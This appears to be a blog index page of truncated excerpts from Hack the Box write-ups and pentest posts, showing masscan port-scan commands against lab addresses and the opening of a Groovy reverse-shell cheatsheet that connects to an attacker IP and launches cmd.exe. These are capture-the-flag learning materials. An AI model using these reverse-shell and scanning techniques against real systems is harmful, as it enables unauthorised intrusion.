Nasur Ullah
Cancel

masscan Initial Port scanning using masscan and nmap : spy0x7: ~/Documents/htb/laboratory → masscan -e tun0 -p1-65535 --rate 500 10.10.10.216 | tee masscan.ports Starting masscan 1.0.5 (http://...

Starting off with masscan & nmap we discover six open TCP ports 135, 8080, 5985, 29817, 29819, 29820: masscan spy0x7: ~/Documents/htb/omni → masscan -e tun0 -p1-65535 --rate 500 10.10.10.204...

Reconnaissance Beginning with masscan to find out open tcp and udp ports and piping it to tee to store the output in a file : spy0x7: ~/Documents/htb/cache → masscan -e tun0 -p1-65535,U:1-65535 ...

This cheatsheet describes various methods for executing remote code in Groovy Language to get an reverse shell. Method 1: String host="10.10.14.25"; int port=1337; String cmd="cmd.exe"; Proce...

I am writing this post because of a recent chain of cool vulnerabilities I got the opportuninty to exploit during a pentest. For security reasons, I am not going to reveal the name of the company,...

Safe – Hack the Box write-up Safe is a retired machine from Hack the Box. It is rated as a easy machine, however, the user own difficulty is rated medium-hard (probably for containing a ROP exploi...

...